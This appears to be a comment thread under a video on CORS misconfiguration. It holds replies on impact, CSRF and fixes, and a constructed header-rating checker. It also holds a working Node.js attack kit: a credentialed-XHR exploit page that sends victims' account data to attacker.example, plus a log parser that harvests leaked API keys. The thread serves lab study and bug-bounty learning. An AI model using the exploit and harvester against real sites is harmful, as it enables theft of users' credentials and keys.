simple and crisp clear. THANKS!
Glad you liked it!
Great explanation
Thanks
Thank you
Have you done the CORS experiments on PortSwigger? In the first level, why did I write an HTML+JavaScript script according to the official PoC and send the request to the victim, but cannot get the API key?
You are making an AJAX request. If you follow that lab, you will see an API call made. Now you want to read the response. You put the AJAX request into a script. Then the victim visits that. The cookies are being sent along and the response is logged at the attacker server. You need to check the log files. Check the solution on PortSwigger. This is the key:
function reqListener() {
    // Runs once the credentialed XHR completes; ships the response body to the attacker server
    location = '/log?key=' + this.responseText;
}
Basically it will be logged at /log?key=
Check the log once you have delivered it to the victim.
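As an added example (my own code, not the lab's or the video's), here is the attacker side of what that reply describes, in Node.js: a builder for the page the victim loads, with the same XHR shape as the PortSwigger PoC, and a small parser that pulls the leaked JSON back out of the attacker web server's access log, which is the step the question was missing. The target URL, the attacker origin, the log lines and the API key value are all constructed for this example.

```javascript
// Added example, not PortSwigger's or the video's code. Target URL, attacker
// origin, log lines and the key value below are constructed.

// Builds the page the victim is lured to. The XHR is sent WITH the victim's
// cookies (withCredentials). If the target reflects the Origin into
// Access-Control-Allow-Origin and adds Access-Control-Allow-Credentials: true,
// the browser exposes the response and reqListener navigates to the attacker
// server with the body in the `key` query parameter.
function buildExploitPage(targetUrl, attackerOrigin) {
  return [
    '<script>',
    'var req = new XMLHttpRequest();',
    'req.onload = reqListener;',
    `req.open('GET', ${JSON.stringify(targetUrl)}, true);`,
    'req.withCredentials = true;',
    'req.send();',
    'function reqListener() {',
    `  location = ${JSON.stringify(attackerOrigin + '/log')} + '?key=' + encodeURIComponent(this.responseText);`,
    '}',
    '</script>',
  ].join('\n');
}

// Parses one access-log line from the attacker server and recovers whatever the
// victim's browser sent. Returns null for lines that are not hits on /log.
function extractLeakFromLogLine(line) {
  // Common log format: <ip> - - [date] "GET /log?key=... HTTP/1.1" <status> <bytes>
  const m = line.match(/"GET (\/log\?[^" ]*) HTTP/);
  if (!m) return null;
  const url = new URL(m[1], 'http://attacker.invalid'); // base only needed to parse a path
  const raw = url.searchParams.get('key'); // percent-decodes the value
  if (raw === null) return null;
  try {
    return JSON.parse(raw);
  } catch {
    return { raw }; // not JSON: keep whatever leaked
  }
}

// Collects API keys from every /log hit in the log.
function harvestApiKeys(logLines) {
  return logLines
    .map(extractLeakFromLogLine)
    .filter((leak) => leak && leak.apikey)
    .map((leak) => leak.apikey);
}

// Constructed sample of the attacker log after one victim visited the page.
const SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /exploit HTTP/1.1" 200 412',
  '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /log?key=%7B%22username%22%3A%22wiener%22%2C%22apikey%22%3A%22K3y-EXAMPLE%22%7D HTTP/1.1" 200 0',
];

console.log(buildExploitPage('https://vulnerable.example/accountDetails', 'https://attacker.example'));
console.log(harvestApiKeys(SAMPLE_LOG)); // the key recovered from the second log line
```

Host the page output on the attacker server, deliver its URL to the victim, and then run the harvester over the server's access log; the key only ever appears in that log, never in the page you delivered.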
Hello,
Does CORS policy help in preventing CSRF attacks?
CORS policy does not directly prevent CSRF attacks because it controls access to responses rather than stopping requests from being made. Proper CSRF defenses, like CSRF tokens or SameSite cookies, are still required to protect against such attacks.
What if the response has:
Access-Control-Allow-Origin: *
but no "allow-credentials" header appears in the response headers?
Is that vulnerable in a real-case scenario?
That totally depends. In a penetration test it's a finding with a low CVSS score. In bug bounty it's usually closed as informative; however, I had 2 companies pay me as a low. Normally they say in the Ts and Cs: CORS with impact. To pass cookies and make it impactful you need the allow-credentials header. Hope that makes sense?
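To make that "depends" concrete, here is an added example (not from the video, the lab or any project) that emulates the decision a browser makes when a page on one origin reads a CORS response from another, and then rates the configuration the way the replies in this thread do: reflected origin plus credentials is the impactful case, a bare wildcard is the low one. The header sets in SAMPLES and the origins are constructed.

```javascript
// Added example, not the video's or PortSwigger's code. Header sets and
// origins below are constructed.

// True if script running on pageOrigin may read a response carrying these
// headers. Header names are lower-cased, as browsers and Node's http module
// expose them. withCredentials is the XHR/fetch credentials flag.
function browserExposesResponse(pageOrigin, withCredentials, headers) {
  const acao = headers['access-control-allow-origin'];
  const acac = headers['access-control-allow-credentials'];
  if (acao === undefined) return false; // no CORS grant at all
  if (!withCredentials) {
    // Anonymous request: '*' or an exact origin match suffices.
    return acao === '*' || acao === pageOrigin;
  }
  // Credentialed request: '*' is never accepted, the origin must match
  // exactly and ACAC must be the literal string 'true'.
  return acao === pageOrigin && acac === 'true';
}

// Rates the configuration from a tester's point of view. probe is the Origin
// value that was sent; headers is what came back.
function rateCorsResponse(probe, headers) {
  const acao = headers['access-control-allow-origin'];
  const credentialed = headers['access-control-allow-credentials'] === 'true';
  if (acao === undefined) return 'none: no CORS headers';
  if (acao === '*') {
    // Browsers refuse '*' together with credentials, so the victim's cookies
    // never make a response readable; only public responses leak.
    return 'low: wildcard origin, unauthenticated responses only';
  }
  if (acao === 'null' && credentialed) {
    return 'high: "null" origin trusted with credentials (reachable from a sandboxed iframe)';
  }
  if (acao === probe && credentialed) {
    return 'high: arbitrary origin reflected with credentials';
  }
  if (acao === probe) {
    return 'low: origin reflected but credentials not allowed';
  }
  return 'none: fixed value ' + acao + ' does not match the probe';
}

// Constructed header sets for the cases discussed in the thread.
const SAMPLES = {
  labReflect: {
    'access-control-allow-origin': 'https://attacker.example',
    'access-control-allow-credentials': 'true',
  },
  wildcardOnly: { 'access-control-allow-origin': '*' },
  allowlisted: {
    'access-control-allow-origin': 'https://app.example',
    'access-control-allow-credentials': 'true',
  },
};

// Runs every sample as if the attacker page were https://attacker.example.
function demo() {
  const probe = 'https://attacker.example';
  return Object.fromEntries(
    Object.entries(SAMPLES).map(([name, h]) => [
      name,
      {
        readableWithCookies: browserExposesResponse(probe, true, h),
        rating: rateCorsResponse(probe, h),
      },
    ])
  );
}

console.log(demo());
```

Feed the function the headers you captured in the proxy for the Origin value you actually sent; a reflected origin with credentials is what the PortSwigger lab reproduces, and the wildcard case is the one the question above is about.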
If the response says status 302, not 200, is it a serious vulnerability? Can the attacker still take advantage of this?
Not necessarily. A 302 is a temporary redirect. You should check how the redirect is initiated. If it's via "Location", usually you can't pull anything meaningful off. Sometimes, however, it will redirect via window.location and then you might be able to introduce XSS.
Hi
What is the impact... please 🥺
Steal sensitive data: By exploiting a vulnerable CORS policy, attackers can bypass same-origin policies and retrieve sensitive information like user credentials, tokens, or personal data from another origin.
Perform unauthorized actions: Attackers can send authenticated requests from a malicious website to a vulnerable API, performing actions on behalf of the victim, such as transferring funds or changing account settings, leading to account compromise or data manipulation.
How about CORS on a POST request? Is that a vulnerability as well?
Yes, absolutely. As a matter of fact, you see CORS vulnerabilities often on POST requests.
I find API subdomains, but most of the API endpoints are not accessible.
They probably need authentication. Most API endpoints will require some sort of authentication.
If I find a CORS bug but it's on a POST request, how do I exploit it? Please reply.
For bug bounty you often don't need to exploit it and can just report the reflected headers. Some will accept it and some won't. For impact it depends. Take a look at the CORS labs from the Web Security Academy. Typically you make an AJAX call from your own host to a sensitive (behind-login) function.
@martinvoelk Hey Martin, I hope you are well. I have been working on BBP as a hatchling and just discovered my first CORS misconfig. Reading through the comments I was looking for impact, and this has answered my questions. THANK YOU!!!!!
@ChristianScott-wj6qm cool
HOW TO PROTECT FROM THIS FFS?!
Sorry, I listened for a few minutes but you just repeated how this vulnerability works.
Ensure that the server only allows trusted origins to make cross-origin requests by properly configuring the Access-Control-Allow-Origin header. Additionally, use proper authentication and authorization mechanisms to prevent unauthorized access to sensitive resources.
Cross-Origin Resource bug
yes